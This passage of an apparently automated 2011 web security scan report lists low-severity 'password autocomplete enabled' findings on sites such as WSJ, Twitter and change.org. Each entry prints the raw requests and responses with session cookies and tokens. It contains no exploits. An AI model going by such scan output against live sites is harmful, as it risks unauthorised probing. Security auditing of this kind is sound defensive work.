Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div>
       <form accept-charset="utf-8" action="/login.php" method="post" id="register">
               <div class="hidden">
...[SNIP]...
</p>
       <input type="password" name="passwd" />
       <p>
...[SNIP]...

12.11. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "28489c2640e7e647e78a76edbda15c6b"
X-Runtime: 762
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=1aa1d10d1da46ec2aca2275d21a57c9b; domain=.change.org; path=/; HttpOnly
Content-Length: 22339
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...
</a>
<form action='https://www.change.org/login/login' class='login' method='post' style='display:none'>
<label class='email_address'>
...[SNIP]...
<label class='password'>
Password
<input name='user[password]' type='password' />
</label>
...[SNIP]...

12.12. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

12.13. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

12.14. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

12.15. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /article/SB10001424052748703956604576110453371369740.html?KEYWORDS=arbor+networks HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:26 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=7a2f1eb2-978f-44b2-9bd7-93572f6b1271; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:26 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:26 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 15:23:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:41 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=31
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

12.16. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

12.17. https://support01.arbornetworks.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support01.arbornetworks.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support01.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:00 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1713
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<div class="login_content">


<form name="login" method="post"><!-- Submit Form to Self !-->
...[SNIP]...
<td class="align_left"><input name="Password" type="password" value="" size="30" maxlength="16"></td>
...[SNIP]...

12.18. http://twitter.com/PracticalMoney  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PracticalMoney

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PracticalMoney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684161-47748-46212
ETag: "123020b57eac8841ca216e71073e2ac7"
Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT
X-Runtime: 0.01070
Content-Type: text/html; charset=utf-8
Content-Length: 50296
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="456c153524fb7fecd6d38280aba8cd72f06dbf17" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.19. http://twitter.com/navyfederalnews  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /navyfederalnews

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /navyfederalnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684162-28021-53593
ETag: "f8784a8a1866b0cf5f586d1676f574b8"
Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT
X-Runtime: 0.01594
Content-Type: text/html; charset=utf-8
Content-Length: 55640
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="3f81a165cfc2e812a25b555eaaefb5d682d0e3cb" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.20. https://windlass.navfedcu.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://windlass.navfedcu.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: windlass.navfedcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 02 Feb 2011 22:03:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1390
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>Server Login</title>
<script language="JavaScript" type="text/javascript">
<!--
function doError(){retur
...[SNIP]...
<body text="#000000" onLoad="document.forms[0].username.focus(); document.forms[0].username.select();" bgcolor="#FFFFFFFF">

<form method="post" action="/names.nsf?Login">
<table border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFCC">
...[SNIP]...
<td>
<input type="password" size="20" maxlength="256" name="password" id="pw-id">
<input type="hidden" name="redirectto" value="/welcome.nsf?OpenDatabase">
...[SNIP]...

12.21. https://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1
Host: www.arbornetworks.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=en; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:36:28 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:36:28 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:36:29 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:36:29 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4828
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<div class="loginBox">        
               <form action="index.php?lang=en" method="post" name="login" class="login">
               
           <p>
...[SNIP]...
<div class="loginRowBoxField"><input type="password" id="mod_login_password" name="passwd" class="inputbox" alt="password" />
           </div>
...[SNIP]...

12.22. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

12.23. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<br />

<form action="/passport/login.html" method="post">
<input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html#comment_form" />
...[SNIP]...
<br/>
<input type="password" id="login_connect-password" class="text_input" name="password" value="password" /><br/>
...[SNIP]...

12.24. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.enewspf.com
Path:   /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
<div class="ja-box-ct clearfix"><form action="http://www.enewspf.com/component/comprofiler/login.html" method="post" id="mod_loginform" style="margin:0px;"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

12.25. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:40 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
